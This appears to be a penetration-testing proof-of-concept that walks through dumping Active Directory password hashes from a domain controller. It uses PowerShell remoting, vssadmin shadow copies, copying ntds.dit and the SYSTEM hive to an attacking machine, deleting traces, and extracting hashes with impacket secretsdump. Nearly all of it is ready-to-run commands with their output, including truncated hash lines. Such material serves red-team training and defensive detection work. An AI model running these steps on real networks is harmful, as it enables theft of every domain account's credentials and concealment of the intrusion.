===================================================================================================================================
OS Credential Dumping (NTDS) using the Windows tool 'VSSadmin'
===================================================================================================================================

The objective is to extract the password hashes of all the domain accounts that are stored in the NTDS.dit file of a Domain Controller.
A valid domain account with high privileges (e.g. member of the 'Domain admins' group or the 'Administrators' group of the Domain Controller)
is required to dump the NTDS.dit file and the registry hive 'HKLM\SYSTEM'.
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\ntds.dit of a domain controller.

> Usefull link: https://attack.mitre.org/techniques/T1003/003/

The Windows native binary 'VSSadmin' can be used to create a Volume Shadow Copy that allow to copy the NTDS file and the registry hive 'HKLM\SYSTEM'.

--------------------------------------------------------------------------------------------------------------
Example/POC - Step 1. Log into a Domain Controller with a privileged account (e.g. Domain Admin)
--------------------------------------------------------------------------------------------------------------

Multiple options exist:
-----------------------
> RDP
> PowerShell remoting
> Wmiexec
> ...

We will use 'PowerShell remoting' for this example/poc:

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\administrator.COMPANY> powershell -exec bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\administrator.COMPANY> cd C:\temp

PS C:\temp> $session1 = new-pssession -ComputerName DC1.company.work

PS C:\temp> enter-pssession $session1

[DC1.company.work]: PS C:\Users\Administrator\Documents> whoami
company\administrator

---------------------------------------------------------------------------------------------------------------------------------------
Example/POC - Step 2 - Use the native windows command 'VSSadmin' to copy the NTDS file (ntds.dit) and the registry hive 'HKLM\SYSTEM'
---------------------------------------------------------------------------------------------------------------------------------------

> First we need to create a volume shadow copy for the 'C:\' drive

    [[DC1.company.work]: PS C:\Users\Administrator\Documents> vssadmin create shadow /for=C:
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    Successfully created shadow copy for 'C:\'
        Shadow Copy ID: {eb20836f-4b32-4af0-a651-548aad2a7a07}
        Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
    
    [DC1.company.work]: PS C:\temp> vssadmin list shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    Contents of shadow copy set ID: {4d462f77-3e81-4712-82b0-64ede147ca83}
       Contained 1 shadow copies at creation time: 2/28/2024 12:39:30 AM
          Shadow Copy ID: {eb20836f-4b32-4af0-a651-548aad2a7a07}
             Original Volume: (C:)\\?\Volume{140062b3-0000-0000-0000-501f00000000}\
             Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
             Originating Machine: DC1.company.work
             Service Machine: DC1.company.work
             Provider: 'Microsoft Software Shadow Copy provider 1.0'
             Type: ClientAccessible
             Attributes: Persistent, Client-accessible, No auto release, No writers, Differential


> Then, we use the Volume Shadow created to copy the NTDS file (ntds.dit) and the registry hive 'HKLM\SYSTEM'

    [DC1.company.work]: PS C:\temp> cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive
            1 file(s) copied.
    
    [DC1.company.work]: PS C:\temp> cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
            1 file(s) copied.
    
    [DC1.company.work]: PS C:\temp> ls
    
        Directory: C:\temp
    
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----       28/02/2024     00:37       20971520 ntds.dit
    -a----       28/02/2024     00:34       13631488 system.hive


> Finally, we delete the Shadow Copy (clean-up)

    [DC1.company.work]: PS C:\Users\Administrator\Documents> vssadmin list shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    Contents of shadow copy set ID: {4d462f77-3e81-4712-82b0-64ede147ca83}
       Contained 1 shadow copies at creation time: 2/28/2024 12:39:30 AM
          Shadow Copy ID: {eb20836f-4b32-4af0-a651-548aad2a7a07}
             Original Volume: (C:)\\?\Volume{140062b3-0000-0000-0000-501f00000000}\
             Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
             Originating Machine: DC1.company.work
             Service Machine: DC1.company.work
             Provider: 'Microsoft Software Shadow Copy provider 1.0'
             Type: ClientAccessible
             Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
    
    [DC1.company.work]: PS C:\Users\Administrator\Documents> vssadmin Delete Shadows /For=C: /Oldest /quiet
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    [DC1.company.work]: PS C:\Users\Administrator\Documents> vssadmin list shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    No items found that satisfy the query.

--------------------------------------------------------------------------------------------------------------
Example/POC - Step 3. Download the files on your attacking machine and clean-up 
--------------------------------------------------------------------------------------------------------------

PS C:\temp> Copy-Item -FromSession $session1 C:\temp\ntds.dit -Destination C:\temp\ntds.dit

PS C:\temp> Copy-Item -FromSession $session1 C:\temp\system.hive -Destination C:\temp\system

PS C:\temp> ls

    Directory: C:\temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       28/02/2024     09:37       20971520 ntds.dit
-a----       28/02/2024     09:34       13631488 system


PS C:\temp> enter-pssession $session1

[DC1.company.work]: PS C:\Users\Administrator\Documents> cd C:\temp
[DC1.company.work]: PS C:\temp>
[DC1.company.work]: PS C:\temp> del .\ntds.dit
[DC1.company.work]: PS C:\temp> del .\system.hive

--------------------------------------------------------------------------------------------------------------
Example/POC - Step 4. Use the tool 'Secretsdump' (impacket) to extract the hashes
--------------------------------------------------------------------------------------------------------------

C:\Temp> secretsdump-packed.exe LOCAL -ntds ntds.dit -system system -user-status

[*] Target system bootKey: 0x52b0453cbc2e56bfed972db77381f5e5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: dc080ac3b818b224446c9052cb404b08
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6af4a2267579f345c4e0<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0<SNIP>
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73<SNIP>
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:d1b0178dbbc0425ec18b8cf8c3f6<SNIP>
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e5d306418c3052d79832c0557ds<SNIP>
company.work\john.wayne:1103:aad3b435b51404eeaad3b435b51404ee:fabc0bc2q<SNIP>
company.work\chuck.norris:1104:aad3b435b51404eeaad3b435b51404ee:cf3a552<SNIP>
company.work\marilyn.monroe:1105:aad3b435b51404eeaad3b435b51404ee:cf3a5<SNIP>
<SNIP>
